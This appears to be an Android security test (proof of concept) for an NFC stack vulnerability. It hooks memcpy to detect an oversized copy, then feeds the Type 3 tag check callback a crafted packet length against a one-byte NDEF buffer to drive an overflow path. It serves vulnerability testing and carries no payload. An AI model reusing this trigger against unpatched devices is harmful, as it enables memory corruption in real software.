/*
 * Copyright (C) 2021 The Android Open Source Project
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

#include <dlfcn.h>
#include <nfa_rw_int.h>
#include <nfc_int.h>
#include <rw_int.h>
#include <stdlib.h>
#include "../includes/common.h"

#define LENGTH 0xBEB

extern tRW_CB rw_cb;
extern tNFC_CB nfc_cb;
void rw_init(void);
void NFA_Init(tHAL_NFC_ENTRY *p_hal_entry_tbl);
bool nfa_rw_activate_ntf(tNFA_RW_MSG *p_data);

bool isInitialized = false;

static void *(*real_memcpy)(void *to, const void *from, size_t numBytes) = nullptr;

void init(void) {
    real_memcpy = (void *(*)(void *, const void *, size_t))dlsym(RTLD_NEXT, "memcpy");
    if (real_memcpy == nullptr) {
        return;
    }
    isInitialized = true;
}

void *memcpy(void *to, const void *from, size_t numBytes) {
    if (!isInitialized) {
        init();
    }
    if (numBytes == LENGTH) {
        exit(EXIT_VULNERABLE);
    }
    return real_memcpy(to, from, numBytes);
}

int freeResourcesAndReturn(int status, tNFA_RW_MSG *ptr1 = nullptr,
                           tNFC_ACTIVATE_DEVT *ptr2 = nullptr, tRW_DATA *ptr3 = nullptr,
                           NFC_HDR *ptr4 = nullptr, uint8_t *ptr5 = nullptr) {
    if (ptr1) {
        if (ptr2) {
            free(ptr2);
        }
        free(ptr1);
    }
    if (ptr3) {
        if (ptr4) {
            free(ptr4);
        }
        free(ptr3);
    }
    if (ptr5) {
        free(ptr5);
    }
    return status;
}

int main() {
    GKI_init();
    rw_init();
    tHAL_NFC_ENTRY p_hal_entry_tbl;
    NFA_Init(&p_hal_entry_tbl);

    tNFA_RW_MSG *p_data = (tNFA_RW_MSG *)malloc(sizeof(tNFA_RW_MSG));
    if (!p_data) {
        return EXIT_FAILURE;
    }
    p_data->activate_ntf.p_activate_params =
        (tNFC_ACTIVATE_DEVT *)malloc(sizeof(tNFC_ACTIVATE_DEVT));
    if (!(p_data->activate_ntf.p_activate_params)) {
        return freeResourcesAndReturn(EXIT_FAILURE, p_data);
    }

    tNFC_ACTIVATE_DEVT *p_activate_params = p_data->activate_ntf.p_activate_params;
    p_activate_params->protocol = NFC_PROTOCOL_T2T;

    nfa_rw_activate_ntf(p_data);

    tRW_CBACK *p_cback = rw_cb.p_cback;
    tRW_DATA *p_rw_data = (tRW_DATA *)malloc(sizeof(tRW_DATA));
    if (!p_rw_data) {
        return freeResourcesAndReturn(EXIT_FAILURE, p_data, p_data->activate_ntf.p_activate_params);
    }

    nfa_rw_cb.cur_op = NFA_RW_OP_READ_NDEF;
    p_rw_data->data.p_data = (NFC_HDR *)malloc(sizeof(NFC_HDR));
    if (!(p_rw_data->data.p_data)) {
        return freeResourcesAndReturn(EXIT_FAILURE, p_data, p_data->activate_ntf.p_activate_params,
                                      p_rw_data);
    }

    nfa_rw_cb.p_ndef_buf = (uint8_t *)malloc(sizeof(uint8_t));
    if (!(nfa_rw_cb.p_ndef_buf)) {
        return freeResourcesAndReturn(EXIT_FAILURE, p_data, p_data->activate_ntf.p_activate_params,
                                      p_rw_data, p_rw_data->data.p_data);
    }

    p_rw_data->data.p_data->len = LENGTH;
    if (p_cback) {
        p_cback(RW_T3T_CHECK_EVT, p_rw_data);
    }

    return freeResourcesAndReturn(EXIT_SUCCESS, p_data, p_data->activate_ntf.p_activate_params,
                                  p_rw_data, p_rw_data->data.p_data, nfa_rw_cb.p_ndef_buf);
}